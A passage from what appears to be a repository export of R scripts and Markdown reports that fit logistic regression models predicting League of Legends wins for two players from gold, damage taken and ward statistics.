<- step(model1)\nsummary(testmodel1)\n\ntestmodel2 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020 + WardsKilled + WardsPlaced, data = biztraindata, family = binomial)\nsummary(testmodel2)\n\ntestmodel3 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020 + WardsKilled + WardsPlaced, data = biztraindata, family = binomial)\nsummary(testmodel3)\n\ntestmodel4 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020 + WardsPlaced, data = biztraindata, family = binomial)\nsummary(testmodel4)\n\ntestmodel5 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, data = biztraindata, family = binomial)\nsummary(testmodel5)\n\n\n# Neither is what I expected, so I brainstormed that maybe games playing as support were affecting the model, so I needed to remove the games he was support also - they're too different.\n\nbizdataedit <- bizdataedit[bizdataedit$Role != \"DUO_SUPPORT\",]\n\n# 360 games are left. I create another test and training data set from this subset.\n\nset.seed(312)\ntrainnums2 <- sample(1:360, 300)\nbiztraindata2 <- bizdataedit[trainnums2,]\nbiztestdata2 <- bizdataedit[-trainnums2,]\nnewmodel1 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel1)\n\nnewmodel2 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + VisionWardsBought + WardsKilled + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel2)\n\nnewmodel3 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + WardsKilled + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel3) \n\nnewmodel4 <- glm(cbind(Winner., Lost) ~ Creeps010 + Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel4)\n\nnewmodel5 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel5)\n\nnewmodel6 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken010 + DamageTaken1020 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel6)\n\nnewmodel7 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020 + SightWardsBought + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel7)\n\nnewmodel8 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020 + WardsPlaced, data=biztraindata2, family=binomial)\nsummary(newmodel8)\n\nnewmodel9 <- glm(cbind(Winner., Lost) ~ Creeps1020 + DamageTaken1020 + Gold1020, data=biztraindata2, family=binomial)\nsummary(newmodel9)\n\nnewmodel10 <- glm(cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020, data=biztraindata2, family=binomial)\nsummary(newmodel10)\n\n# Surprisingly similar to the previous models. I better leave it here then.\n\n# Time to use the model to predict with the training data and see how accurate it is.\n\nresult2 <- predict(newmodel10, biztestdata2, type=\"response\")\nresult2[result2 >= .5] <- 1\nresult2[result2 < .5] <- 0\n\ncbind(result2, biztestdata2$Winner., result2==biztestdata2$Winner.)\nsum(result2==biztestdata2$Winner.)\n\n# It predicted 40 out of the 60 games correctly.\n\nsum(result2==1 & biztestdata2$Winner.==0)\n\nsum(result2==0 & biztestdata2$Winner.==1)\n\n# It predicted 10 losses as wins, and 10 wins as losses, which is great in one sense - we want the errors to be random, and now it seems that they are.\n\n# We can calculate a Cohen's Kappa statistic to assess whether the model is truly predicting beyond random chance.\n\nsum(biztestdata2$Winner. == 1)\n\nsum(result2 == 1)\n\n# Actual percentage of wins = .55; predicted percentage of wins = .55. .55*.55=.3025, and .45*.45=.2025.\n# So we expect the model would be right about .3025+.2025 = 50.5% of the time by random chance.\n\n# It matched 66.7% instead, so the formula for Cohen's Kappa will be:\n(.667-.505)/(1-.505) # =.327\n\n# This is a decent Cohen's Kappa, confirming that the model is correctly predicting beyond random chance\n# because .327 > 0. It isn't predicting remarkably consistently but we can discuss that in the conclusion.\n\n# Here are some useful plots:\n\nlibrary(ggplot2)\n\nggplot(data=biztraindata2, aes(Gold1020, DamageTaken1020)) + geom_point(aes(color=as.factor(Winner.))) + scale_color_manual(name=\"Outcome\", labels=c(\"Lost\", \"Won\"), values=c(\"red\", \"blue\")) +\n labs(title=\"Plot of Significant Variables\", x=\"Gold Earned per Minute from Minutes 10 to 20\", y=\"Damage Taken per Minute from Minutes 10 to 20\")\n\n# Plot for Probability as determined by Gold1020 when DamageTaken1020 is held at its mean\nbizfunc <- exp(-3.0985 - 0.0016*mean(biztraindata2$DamageTaken1020) + .0118*c(150:715))/(1 + exp(-3.0985 - 0.0016*mean(biztraindata2$DamageTaken1020) + .0118*c(150:715)))\nbizfuncdata <- as.data.frame(cbind(bizfunc, c(150:715)))\nggplot(data=bizfuncdata, aes(c(150:715), bizfunc)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Gold Earned from 10-20 Changes\", x=\"Gold Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n# Same for DamageTaken1020\nbizfunc2 <- exp(-3.0985 - 0.0016*c(100:1300) + .0118*mean(biztraindata2$Gold1020))/(1 + exp(-3.0985 - 0.0016*c(100:1300) + .0118*mean(biztraindata2$Gold1020)))\nbizfunc2data <- as.data.frame(cbind(bizfunc2, c(100:1300)))\nggplot(data=bizfunc2data, aes(c(100:1300), bizfunc2)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Damage Taken from 10-20 Changes\", x=\"Damage Taken Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6508601307868958,
"alphanum_fraction": 0.7304412722587585,
"avg_line_length": 39.75609588623047,
"blob_id": "31335d4e9a5508dac19ac4e49ad71344e355bad9",
"content_id": "9e9439f427e4efa9705bd2a52b2f93ef0a34b818",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6685,
"license_type": "no_license",
"max_line_length": 272,
"num_lines": 164,
"path": "/Player-A-Model/Player A Analysis.R",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "# R Analysis - Player A\n\nrbdata <- read.table(\"D:\\\\My Documents\\\\LoL Analysis Data\\\\r****b****_history.csv\", sep=\",\", header=T)\n\n# I know this player primarily plays support so that's what I'm interested in this time.\n\nrbdata2 <- rbdata[rheyndata$Role == \"DUO_SUPPORT\",]\n\n# This leaves 224 observations remaining.\n\nrbdata2$Winner. <- as.character(rbdata2$Winner.)\nrbdata2$Winner. <- replace(rbdata2$Winner., rbdata2$Winner. == 'True', '1')\nrbdata2$Winner. <- replace(rbdata2$Winner., rbdata2$Winner. == 'False', '0')\nrbdata2$Winner. <- as.numeric(rbdata2$Winner.)\nLost <- 1 - rbdata2$Winner.\nrbdata2 <- cbind(rbdata2, Lost)\n\n# I'm going to remove games that lasted less than twenty minutes\n\nrbdata2 <- rbdata2[is.na(rbdata2$Creeps1020) == FALSE,]\n\n# That only removed two observations (which is good, I was expecting it to be low)\n# so there are now 222 remaining.\n\n# I'm going to split the data into 180 observations for training the model and 42 observations for testing it.\n\nset.seed(317)\ntrainnums <- sample(1:222, 180)\nrbtraindata <- rbdata2[trainnums,]\nrbtestdata <- rbdata2[-trainnums,]\n\n# Let's look at two more vectors\n\nrbdata2$Creeps010\nmean(rbdata2$Creeps010)\nrbdata2$Creeps1020\nmean(rbdata2$Creeps1020)\n\n# On average Player A is getting a creep score of 1 or 2 in the first ten minutes\n# and an additional 3 in minutes 10 to 20. Not per minute, just the total creeps\n# across the time span. This is so meaninglessly low it would not be wise to include\n# this in the model either.\n\n# Time to try a model\n\nmodel1 <- glm(cbind(Winner., Lost) ~ DamageTaken010 + DamageTaken1020 + Gold010 + Gold1020 + SightWardsBought + TotalTimeCCDealt + VisionWardsBought + WardsKilled + WardsPlaced, data=rbtraindata, family=binomial)\nsummary(model1)\n\nmodel2 <- update(model1, . ~ . -SightWardsBought)\nsummary(model2)\n\nmodel3 <- update(model2, . ~ . -WardsKilled)\nsummary(model3)\n\nmodel4 <- update(model3, . ~ . -VisionWardsBought)\nsummary(model4)\n\nmodel5 <- update(model4, . ~ . -DamageTaken010)\nsummary(model5)\n\nmodel6 <- update(model5, . ~ . -Gold010)\nsummary(model6)\n\nmodel7 <- update(model6, . ~ . -TotalTimeCCDealt)\nsummary(model7)\n\ntestmodelstep <- step(model1) # Stepwise method matched Model 6\nsummary(testmodelstep)\n\n\n# I'm now debating a bit between between the stepwise model and Model 7.\n# I'm going to use both to predict on the test data set and see which one performs better.\n\n\n# For Model 7:\n\nresult7 <- predict(model7, rbtestdata, type=\"response\")\nresult7[result7 >= .5] <- 1\nresult7[result7 < .5] <- 0\n\nsum(result7==rbtestdata$Winner.)\n\n# It predicted 35 out of 42 games correctly.\n\nsum(result7==1 & rbtestdata$Winner.==0)\n\nsum(result7==0 & rbtestdata$Winner.==1)\n\n# It incorrectly predicted 4 games that were actually losses and\n# 3 games that were actually wins. This is reasonably evenly spread.\n\nsum(result7==1 & rbtestdata$Winner.==1)\n\nsum(result7==0 & rbtestdata$Winner.==0)\n\n# Of the correctly predicted games, 28 were wins and 7 were losses.\n# But that means there were 31 wins and 11 losses in the test data by random\n# chance, so that doesn't worry me. We can calculate Cohen's Kappa to\n# compensate for this.\n\n# Actual percentage of wins = .74; predicted percentage of wins = .67. .74*.67 = .495, and .26*.33 = .085.\n# So we expect the model would be right about .44+.1 = 58% of the time by random chance.\n\n# It matched 83% instead, so the formula for Cohen's Kappa will be:\n(.83-.58)/(1-.58) # = .5952\n\n\n# For the Stepwise Model:\n\nresultstep <- predict(testmodelstep, rbtestdata, type=\"response\")\nresultstep[resultstep >= .5] <- 1\nresultstep[resultstep < .5] <- 0\n\nsum(resultstep==rbtestdata$Winner.)\n\n# It predicted 35 out of 42 games correctly.\n\nsum(resultstep==1 & rbtestdata$Winner.==0)\n\nsum(resultstep==0 & rbtestdata$Winner.==1)\n\n# It incorrectly predicted 3 games that were actually losses and\n# 4 games that were actually wins. This is reasonably evenly spread.\n\nsum(resultstep==1 & rbtestdata$Winner.==1)\n\nsum(resultstep==0 & rbtestdata$Winner.==0)\n\n# Of the correctly predicted games, 27 were wins and 8 were losses.\n# But that means there were 31 wins and 11 losses in the test data by random\n# chance, so that doesn't worry me. We can calculate Cohen's Kappa to\n# compensate for this.\n\n# Actual percentage of wins = .74; predicted percentage of wins = .643. .74*.643 = .476, and .26*.357 = .093.\n# So we expect the model would be right about .476+.093 = 57% of the time by random chance.\n\n# It matched 81% instead, so the formula for Cohen's Kappa will be:\n(.81-.57)/(1-.57) # = .5581\n\n# Here are some helpful graphs.\n\nlibrary(ggplot2)\n\nggplot(data=rbtraindata, aes(Gold1020, DamageTaken1020)) + geom_point(aes(color=as.factor(Winner.), size=WardsPlaced)) + scale_color_manual(name=\"Outcome\", labels=c(\"Lost\", \"Won\"), values=c(\"red\", \"blue\")) +\n scale_size_continuous(range=c(0,8))\n\nmean(rbtraindata$WardsPlaced[rbtraindata$Winner.==1])\nmean(rbtraindata$WardsPlaced[rbtraindata$Winner.==0])\n\n# Function for probability regarding WardsPlaced with others at mean\nfunc1 <- exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*mean(rbtraindata$Gold1020)+.066109*c(1:50))/(1 + exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*mean(rbtraindata$Gold1020)+.066109*c(1:50)))\nwardvalue <- c(1:50)\nfunc1data <- as.data.frame(cbind(func1, wardvalue))\nggplot(data=func1data, aes(wardvalue, func1)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Wards Placed Changes\", x=\"Wards Placed\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n# Same for Gold1020\nfunc2 <- exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*c(100:450)+.066109*mean(rbtraindata$WardsPlaced))/(1 + exp(-4.674-.005002*mean(rbtraindata$DamageTaken1020)+.020411*c(100:450)+.066109*mean(rbtraindata$WardsPlaced)))\nfunc2data <- as.data.frame(cbind(func2, c(100:450)))\nggplot(data=func2data, aes(c(100:450), func2)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Gold Earned from 10-20 Changes\", x=\"Gold Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n# Same for DamageTaken1020\nfunc3 <- exp(-4.674-.005002*c(0:900)+.020411*mean(rbtraindata$Gold1020)+.066109*mean(rbtraindata$WardsPlaced))/(1 + exp(-4.674-.005002*c(0:900)+.020411*mean(rbtraindata$Gold1020)+.066109*mean(rbtraindata$WardsPlaced)))\nfunc3data <- as.data.frame(cbind(func3, c(0:900)))\nggplot(data=func3data, aes(c(0:900), func3)) + geom_line(size=1) + labs(title=\"Predicted Probability of Winning as Damage Taken from 10-20 Changes\", x=\"Damage Taken Per Minute from Minute 10 to 20\", y=\"Predicted Probability of Winning\") + scale_y_continuous(limits=c(0,1))\n\n"
},
{
"alpha_fraction": 0.7392192482948303,
"alphanum_fraction": 0.7675675749778748,
"avg_line_length": 117.0851058959961,
"blob_id": "921ee39015b2f9860bda2d5cfda9687974f00e83",
"content_id": "c35a37f0489f0d4d24155e686650cd18e49dddf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16650,
"license_type": "no_license",
"max_line_length": 1207,
"num_lines": 141,
"path": "/Player-A-Model/Report for Player A.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#League of Legends Project - Player A Analysis\n#####Gabe Hinton\n\nSummary\n=======\n\nAfter creating a logistic regression model to predict whether Player T would win or lose a game of League of Legends as Top, Mid, or ADC role, this analysis was done to focus on a player who primarily plays support (called Player A) to see how similar or different a model predicting the outcomes of his games would be to that of Player T's. This gives insight into the extent to which the model can be expected to generalize to more players. Ideally, if higher quality models (with respect to predictive power) are able to be formed, players could use them as a tool to assess areas for improvement specific to their role, champion, or team. Thanks to Riot Games, Inc. for having a public API making data collection for this analysis possible.\n\nA logistic model was formed starting with a long list of variables - the same as for Player T, except Creeps010 and Creeps1020 were omitted because intuitively they do not make much sense for a support. Furthermore the specific observed values for Player A's creep scores also don't make much sense for prediction because they were consistently below 5 for each ten minute chunk.\n\nAs before, there are notable limitations on this analysis. League of Legends is first and foremost a team game so any model looking at the behaviors and statistics of only one player is limited in scope. In addition, the model does not necessarily imply causation, because for example gold can be earned in a variety of ways, so one must wonder whether gold predicting a victory or loss does so because of the items Player A can purchase with the gold, or because of the actions he performed that earned him the gold put his team in a better position to win the game. Similarly, the number of wards he places would be impacted by how long the game is, which is not accounted for in this analysis.\n\nIn addition, the observations for Player A cover a longer range of his total time as a player of League than Player T, so nothing is built into the model to account for Player A's skill continuing to increase over time, so that also becomes a lurking variable that could be considered in a future analysis.\n\nIn the end, the clear predictors of the outcome were Gold1020 and DamageTaken1020, the two variables in the final model for Player A, as well as WardsPlaced, which was a nice confirmation of intuition about the importance of map vision in a game of LoL. The final model was:\n\nPredicted Probability of Winning the Game = e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced} / (1 + e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced})\n\nIn closing, perhaps aside from placing wards and disarming enemy players with crowd control abilities the first ten minutes of the game again seem to be poor predictors of the game outcome, as with Player T. One wonders though about the variables regarding gold and damage taken in minutes 10 to 20 showing up again - this may perhaps provide more evidence that these variables are just reflections of Player A and T's skills like good team fight engagement positioning and number of kills, rather than suggesting they should actively forsake other activities to get more gold and take less damage in order to win the game. Placing wards seems to clearly be an important factor in winning games to improve map vision for Player A. On the other hand, perhaps he is more likely to remember to continue placing wards in games that his team is currently winning. In short, there are some interesting conclusions, and plenty of room for further exploration and model building. Some possible paths to look into include separating gold from creep farming and gold from kills to try to reduce lurking variables, and building models that account for these variables across an entire team instead of a single player.\n\nObjectives\n==========\n\nTo avoid repetition, it is recommended you read the analysis of Player T first for an explanation of logistic regression and the intention of that analysis. This analysis is a follow up to that one, in that Player T primarily plays Top, Mid, and ADC, while this analysis's subject, Player A, mainly plays support. The goal is to find whether a similarly built logistic model to predict victory or loss in a game using data from a support player looks similar or very different to the model for Player T.\n\nData Summary\n============\n\nPlayer A has not played as many games as Player T, so the API was used to search for the past 360 ranked games of Player A and data was pulled for a variety of variables from each of those games. The variables are as follows:\n\nChampion: An identification number for the character Player T chose to play as for that match \nCreeps010: The number of creeps Player T killed per minute across the first ten minutes of the match \nCreeps1020: The number of creeps Player T killed per minute from minute ten through twenty \nCreeps2030: The number of creeps Player T killed per minute from minute twenty through thirty \nDamageTaken010: The amount of damage Player T received per minute during the first ten minutes of the match \nDamageTaken1020: The amount of damage Player T received per minute from minute ten to twenty \nDamageTaken2030: The amount of damage Player T received per minute from minute twenty to thirty \nGold010: The amount of gold Player T earned per minute during the first ten minutes of the match \nGold1020: The amount of gold Player T earned per minute from minute ten to twenty \nGold2030: The amount of gold Player T earned per minute from minute twenty to thirty \nLane: The team \"position\" Player T played during the match \nMatchID: A number string identifying the match in Riot's API \nNeutralMinionsKilled: The number of neutral minions Player T killed throughout the game \nNeutralMinsEnemyJungle: The number of neutral minions Player T killed in enemy territory \nNeutralMinsTeamJungle: The number of neutral minions Player T killed in his own team's territory \nRole: \"Solo\" - mid or top lane as according to Lane; \"None\" - he played the \"Jungle\" role; \"Duo\\_Carry\" - ADC; \n \"Duo\\_Support\" - Support \nSightWardsBought: The number of sight wards Player T bought throughout the game \nTotalTimeCCDealt: The sum of all seconds an enemy player was stuck in a \"crowd control\" ability by Player T \nVisionWardsBought: The number of vision wards Player T bought throughout the game \nWardsKilled: The number of enemy wards Player T destroyed throughout the game \nWardsPlaced: The number of wards of any type Player T placed throughout the game \nWinner.: 1 if Player T's team won the game, 0 otherwise \nLost: 1 if Player T's team lost the game, 0 otherwise \n\nAs before, certain additional variables could have been pulled from Riot's API but were deliberately omitted. While variables such as Kills, Assists, Inhibitor Kills, and Damage Dealt could each perhaps do a notable job of predicting whether Player A was the winner or loser, they are not very useful to the intent of the analysis. As a match in League of Legends nears its end, the team that ultimately wins typically gains momentum and begins to accumulate more kills, assists, and inhibitor kills than the team that loses. It seems highly likely that these variables can predict the winner, but that is because these are specifically the actions that cause a team to win in the first place. The goal of this analysis is to find player behaviors that less obviously could push a team to victory, as well as look at behavior that focuses more specifically on the early game through the API's time designations (\"010\", \"1020\", and \"2030\" variables.)\n\nChampion, MatchID, Role, and Lane were all collected as a means of sorting data and were not actually included in the model. Role and Lane could certainly have been included to explore interaction effects, and there would be value in doing so in a future analysis. For a preliminary exploratory analysis, they were omitted for simplicity's sake.\n\nRather than omitting support and jungle observations as done with Player T, background knowledge of Player A informed that he primarily plays the support role. Therefore all roles except support were removed. As with player A, the few games that end before twenty minutes were also removed since they throw an unnecessary wrench in trying to view patterns among typical games. This left 222 observations to work with.\n\nFinally, the data was divided into 180 observations randomly selected to be a training data set to build the model, and the remaining 42 observations served as a test data set to assess how well the model could predict outcomes.\n\nAnalysis\n========\n\nAs mentioned previously, the analysis for Player T provides a more thorough background of the modeling method used. In short, the model is a logistic regression using values for the predictor variables to predict a probability of a binary response, in this case winning or losing the game.\n\nThis time there was no need for intuition in determining order of variables removed; they all fell into place rather logically. An alpha value of .05 was used again as the acceptable probability of an incorrect conclusion.\n\nFollowing this procedure, the model reached was as follows:\n\n ## \n ## Call:\n ## glm(formula = cbind(Winner., Lost) ~ DamageTaken1020 + Gold1020 + \n ## WardsPlaced, family = binomial, data = rbtraindata)\n ## \n ## Deviance Residuals: \n ## Min 1Q Median 3Q Max \n ## -2.4035 -0.8944 0.4450 0.8736 1.6604 \n ## \n ## Coefficients:\n ## Estimate Std. Error z value Pr(>|z|) \n ## (Intercept) -4.674429 1.262221 -3.703 0.000213 ***\n ## DamageTaken1020 -0.005002 0.001436 -3.483 0.000495 ***\n ## Gold1020 0.020411 0.003928 5.197 2.03e-07 ***\n ## WardsPlaced 0.066109 0.028024 2.359 0.018322 * \n ## ---\n ## Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1\n ## \n ## (Dispersion parameter for binomial family taken to be 1)\n ## \n ## Null deviance: 245.16 on 179 degrees of freedom\n ## Residual deviance: 192.80 on 176 degrees of freedom\n ## AIC: 200.8\n ## \n ## Number of Fisher Scoring iterations: 4\n\nSo we see that the three significant variables are WardsPlaced, DamageTaken1020, and Gold1020. This is reasonably intuitive when plotting these variables into a graph:\n\n\n\nBlue points are games that Player A won, and red points are games he lost. The size of the point is based on how many wards he placed in that game. We can see a trend that more wins (blue points) are found as we go further down and to the right on the plot, exactly as we expect. (Remember that smaller values of Damage Taken are preferred.) There are exceptions at the extremes, and more of a mix of points around the middle of the plot, which is also expected. There are a multitude of variables not considered in the analysis, so we do not expect to be able to predict perfectly and account for all variation.\n\nRecall that the primary output is in terms of \"log-odds\", which when taken as the power of mathematical *e* produces odds, the ratio of probability of success divided by probability of failure. With this in mind, the model coefficient (under the column Estimate in the table) when taken as the power of mathematical *e* produces the multiplicative change in odds for an increase of one in the corresponding variable, assuming all the other predictor variables are held at a constant value. Using all of this, we can interpret this model. \n\nFor an increase of 1 damage taken per minute during minutes 10 to 20, the predicted odds that Player A will win the game are multiplied by *e^-.005 = .995*. If it increases by 10 then the odds are multiplied by .95. We can interpret this as probability with a bit more math. *Probability = Odds / (1 + Odds)* If we plug in the mean of all the other variables into the formula and calculate the result at each point on the range of DamageTaken1020, we can graph how the predicted probability of winning changes as DamageTaken1020 changes. The axis for damage taken will only cover the range observed in the data to avoid drawing bad conclusions by assuming behavior not actually seen.\n\n\n\nAgain, note that this graph is only specific to when WardsPlaced and Gold1020 are at their average level. The general trend will be similar for most values, however.\n\nIncreasing his average gold per minute for minutes 10 to 20 by 1 multiplies his odds of winning by *e^.0204 = 1.02*. If he increases it by 100 (meaning improves on his total gold across minutes 10 to 20 by 1000) his predicted odds of winning are multiplied by 7.69. \n\nWe can similarly build a plot for how predicted probability of winning changes as gold per minute from minutes 10 to 20 changes by plugging in the means for DamageTaken1020 and WardsPlaced.\n\n\n\nFinally, for each individual ward he places during a match his predicted odds of winning increase *e^.0661 = 1.07*. And once again by holding DamageTaken1020 and Gold1020 at their means, a plot can be graphed of how number of wards placed changes the predicted probability of winning.\n\n\n\nNext the test data set was placed into this model to see how well the model would do at predicting the 42 known outcomes. The results were as follows:\n\n| | Model Predicts Victory | Model Predicts a Loss |\n|----------------|------------------------|-----------------------|\n| Actual Victory | 28 | 3 |\n| Actual Loss | 4 | 7 |\n\n35 out of 42 correct predictions is fantastic, and the incorrect predictions are evenly split suggesting the errors can be considered random. This seems like a highly successful model. This can be further verified by calculating a Cohen's Kappa statistic, which is meant to demonstrate how good of a job the model is at predicting the correct outcome while also penalizing for a quantity of correct guesses that would be expected from random chance. A Kappa of less than zero means it predicted less than expected from random chance, while one is perfect predictions. The details of this calculation can be seen in Player A Analysis, the R code file. The resulting statistic is K = .5952. This is satisfyingly high, and is even higher than the Cohen's Kappa associated with Player T's data.\n\nConclusion\n==========\n\nOur final model is as follows:\n\nPredicted Probability of Winning the Game = e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced} / (1 + e^{-4.67 - .005\\*DamageTaken1020 + .0204\\*Gold1020 + .0661\\*WardsPlaced})\n\nThis model does have a notable amount of predictive power for Player A's games, and it is reassuring to see WardsPlaced included, since that seems intuitive for the support role. The reappearance of DamageTaken1020 and Gold1020 from Player T's model adds an interesting element of confirmation, but at the same time may also raise concerns that those are products of kills and assists that are more accurately a reflection of a team being in the lead. Player A can take comfort that early game mistakes can be recovered from and early game leads are not reason to be overzealous. Whether the increased amount of wards placed are causing the team to be more likely to win, or whether he is more likely to remember to place wards when his team is already winning, the conclusion remains that reminding himself to place wards continually is clearly helpful to his team.\n\nIf nothing else, this model is a notable starting point to attempt more complicated models in the future, perhaps incorporating similar variables but across all members of a team to predict the outcome, or testing variables that also account for changes based on the champion selected (called an interaction effect.) There is a great deal of potential for more detailed, complicated modeling and many possible directions from which to tackle the question. At the very least, this analysis does suggest it may be possible and thus worth the time to attempt in the future.\n"
},
{
"alpha_fraction": 0.7353648543357849,
"alphanum_fraction": 0.7648663520812988,
"avg_line_length": 121.18079376220703,
"blob_id": "9dac8dc570a35a1ec53e83dfe1e02ca285516d0b",
"content_id": "6571cc75cca8a5f5b002bf214420f54f46ed06fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21626,
"license_type": "no_license",
"max_line_length": 1283,
"num_lines": 177,
"path": "/Player-T-Model/Report for Player T.md",
"repo_name": "GabeHinton/League-Project",
"src_encoding": "UTF-8",
"text": "#League of Legends Project - Report for Player T\n#####Gabe Hinton\n\nSummary\n-------\n\nUsing Riot Games, Inc.'s public API a match history of 490 ranked games was pulled for a player referred to as Player T. For each of these games a number of variables were collected related to the player's behavior and actions during the game. A logistic regression was performed to explore whether any of these behaviors and actions, with an emphasis on behaviors during the early phases of the game, seemed to be closely related to eventually winning or losing the game. Long term, the goal of finding such models is to see if they can be generalized to fit more players, expand the models to account for more lurking variables, expand them to account for multiple players on a team, and ultimately to use them as a tool to help players identify areas of focus for improvement in their playing.\n\nObservations of games in which Player T was the Jungle or Support role were removed because the nature of those roles is so distinct from Top, Mid, and ADC that they would likely need a unique list of variables to have reasonable predictions.\n\nIt is important to also note the limits of this analysis from the outset, for example noting that League of Legends is first and foremost a team game, so problems immediately arise from trying to predict the outcome of the game looking at only one player on that team. In addition, it is difficult to claim causation from this analysis when a variable like gold, for example, could be increasing as a result of variables that were not considered, like number of kills. \n\nA logistic model was successfully made on a training data set of 300 observations. Surprisingly, the only significantly related variables to victory or loss were gold earned per minute from minutes ten to twenty and damage taken per minute from minutes ten to twenty. The model built was as follows:\n\nPredicted Probability of Winning = e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020} / (1 + e^{-3.0985 - 0.0016\\*DamageTaken1020 + .0118\\*Gold1020})\n\nUsing a test data set of 60 observations, a Cohen's Kappa statistic was calculated to determine whether the model was predicting the outcome of the 60 games accurately beyond random chance. Cohen's Kappa was .327. It was predicting outcomes with more accuracy than would happen from normal chance, but not remarkably so. Gold earned per minute from minute ten to twenty and damage taken per minute from minute ten to twenty definitely have a relationship with victory, but it is not strong.\n\nPerhaps most interestingly, variables from minutes zero to ten of a match were not very related to victory at all. This suggests that Player T's early game performance does not have a strong impact on the outcome of the game, meaning he has room to make a comeback from a poor start, and should also avoid getting overzealous from an early lead.\n\n\nObjectives\n----------\n\nLeague of Legends is a Player versus Player online game created by Riot Games, Inc. in which two teams of five compete against each other to destroy towers and ultimately each other's bases. Riot has a public API from which anyone is allowed to pull data, typically for software developers who want to create apps all players can use to find statistics about champions or basic details about their own performance. Additionally, the API can be searched by player name, including a history of game matches. This match history typically also contains very detailed information for each player in the game, and for some categories even breaks the numbers down into ten minute chunks of the game. This analysis attempts to use that data to see whether a specific player's behavior and actions in the game, with an emphasis on the early phases of the game, can be modeled to reliably predict whether that player will win. \n\nData Summary\n------------\n\nThe API was used to search for the past 490 ranked games of a specific player (referred to as Player T,) and data was pulled for a variety of variables from each of those 490 games. The variables are as follows:\n\nChampion: An identification number for the character Player T chose to play as for that match \nCreeps010: The number of creeps Player T killed per minute across the first ten minutes of the match \nCreeps1020: The number of creeps Player T killed per minute from minute ten through twenty \nCreeps2030: The number of creeps Player T killed per minute from minute twenty through thirty \nDamageTaken010: The amount of damage Player T received per minute during the first ten minutes of the match \nDamageTaken1020: The amount of damage Player T received per minute from minute ten to twenty \nDamageTaken2030: The amount of damage Player T received per minute from minute twenty to thirty \nGold010: The amount of gold Player T earned per minute during the first ten minutes of the match \nGold1020: The amount of gold Player T earned per minute from minute ten to twenty \nGold2030: The amount of gold Player T earned per minute from minute twenty to thirty \nLane: The team \"position\" Player T played during the match \nMatchID: A number string identifying the match in Riot's API \nNeutralMinionsKilled: The number of neutral minions Player T killed throughout the game \nNeutralMinsEnemyJungle: The number of neutral minions Player T killed in enemy territory \nNeutralMinsTeamJungle: The number of neutral minions Player T killed in his own team's territory \nRole: \"Solo\" - mid or top lane as according to Lane; \"None\" - he played the \"Jungle\" role; \"Duo\\_Carry\" - ADC; \n \"Duo\\_Support\" - Support \nSightWardsBought: The number of sight wards Player T bought throughout the game \nTotalTimeCCDealt: The sum of all seconds an enemy player was stuck in a \"crowd control\" ability by Player T \nVisionWardsBought: The number of vision wards Player T bought throughout the game \nWardsKilled: The number of enemy wards Player T destroyed throughout the game \nWardsPlaced: The number of wards of any type Player T placed throughout the game \nWinner.: 1 if Player T's team won the game, 0 otherwise \nLost: 1 if Player T's team lost the game, 0 otherwise \n\nCertain additional variables could have been pulled from Riot's API but were deliberately omitted. While variables such as Kills, Assists, Inhibitor Kills, and Damage Dealt could each perhaps do a notable job of predicting whether Player T was the winner or loser, they are not very useful to the intent of 